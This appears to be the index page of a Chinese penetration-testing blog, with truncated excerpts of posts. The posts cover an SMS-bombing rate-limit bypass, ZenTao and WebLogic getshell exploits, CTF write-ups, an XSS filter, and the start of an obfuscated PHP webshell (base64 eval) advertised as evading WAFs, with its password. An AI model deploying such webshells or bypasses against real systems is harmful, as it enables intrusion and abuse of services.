渗透测试

【转载】高级持续渗透系列

** 原作者:Micropoor博客地址(访问需FQ):https://micropoor.blogspot.com/ 本文章将跟随Micropoor前辈一起更新 文件目录地址:http://pan.ximcx.cn/home/%E5%AE%89%E...继续阅读 »
渗透测试

短信轰炸之空格或\n绕过

这个姿势是我在7、8月份做测试的时候发现的~~~ 但是在最近的一次测试中又有网站出现同样的问题,所以分享下。。。 0x01 先抓包获取发验证码的数据包,并成功发送 0x02 接着连续发送这个数据包。。会提示次数超过限制...继续阅读 »
渗透测试

NewBugKu-CTF最新全部题目WRITE UP

[该文章已设置加密,请点击标题输入密码访问]继续阅读 »
渗透测试

禅道8.2 - 9.2.1前台Getshell&注入EXP

发这个是因为昨天遇到一个站。。。也是这个系统,目标站注入不出账号密码,拿不到账号密码只能写shell了..... 从星期六中午搞至星期天晚上~~终于在今天晚上6点多拿到了shell........... 在这期间也走了很多很多弯路。。。希望这篇帖子对大...继续阅读 »
渗透测试

Java简单的XSS过滤方法

import java.io.UnsupportedEncodingException; import java.net.URLDecoder; public class Xss { public static ...继续阅读 »
渗透测试

[未完]记录CTF练习平台的一些WRITEUP WEB

CTF练习平台:http://ctf.bugku.com web2 直接F12查看源码 计算器 打开题目输入正确结果发现只能输入一个字符,然后源码改变长度,即可输入 ...继续阅读 »
渗透测试

2018最新过全WAF/CDN/D盾/安全狗小马Or大马

首先感谢土司大佬:Math_random 上代码---注意菜刀链接密码为:ximcx <?php $x="BaSe64"; $b="_deCOde"; $c=$x.$b; eval($cc = $c('JGhhbmRs...继续阅读 »
渗透测试

记录WebLogic(CVE-2017-10271)反序列化漏洞找WEBSHELL地址

首先,郭姓某牛丢来了一个有weblogic漏洞的地址http://x.x.x.x:7001 说用k8的weblogic2628去getshell不能链接shell,我也试了下,好像确实不能链接...... 接着...继续阅读 »
渗透测试

WebLogic T3 反序列化绕过漏洞(CVE-2018-2893)检测POC

脚本来自指尖安全B牛。原文地址:https://www.secfree.com/article-957.html #!env python # -*- coding: utf-8 -*- import so...继续阅读 »
sitemap